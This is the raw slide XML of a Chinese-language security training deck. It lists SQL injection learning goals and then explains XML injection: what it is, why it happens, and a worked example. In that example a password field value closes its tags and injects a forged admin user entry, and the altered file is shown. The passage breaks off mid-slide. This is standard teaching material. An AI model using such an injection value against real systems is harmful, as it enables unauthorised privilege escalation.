              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞对于数据安全的影响</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞的方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解常见数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查询方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ORACLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库的注入方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞的类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的安全防护</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞修复和防范方法 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞检测工具的使用方法 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11300686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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18347087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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞产生的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞检测与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防护</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞的利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如何修复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5372279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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入漏洞。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入类似于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件一般用作存储数据及配置，如果在修改或新增数据时，没有对用户可控数据做转义，直接输入或输出数据，都将导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2145079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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入产生的原因</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入产生的原因与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入差不多。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传输的数据包含了标签内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改数据时会覆盖原有的标签</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1570906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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞例子</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器是生成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来存储用户数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;?xml version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>="UTF-8"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;USER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>role="guest"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;name&gt;user&lt;/name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;/USER&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;USER role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>="admin"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;name&gt;admin&lt;/name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;1adtyr32e762t7te3&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&lt;/USER&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15759355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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞例子（续）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>guest</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户申请改密码，会更改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要是用户提交的不是简单的字母组合，而是如下信息：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>12345&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;&lt;/USER&gt;&lt;USER role="admin"&gt;&lt;name&gt;admin&lt;/name&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;123456&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>&gt;&lt;/USER&gt;&lt;!---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042254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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞例子（续）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>这样，配置文件会变成：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>&lt;USER rule="guest"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>&lt;name&gt;user&lt;/name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>12345&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" u="sng" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
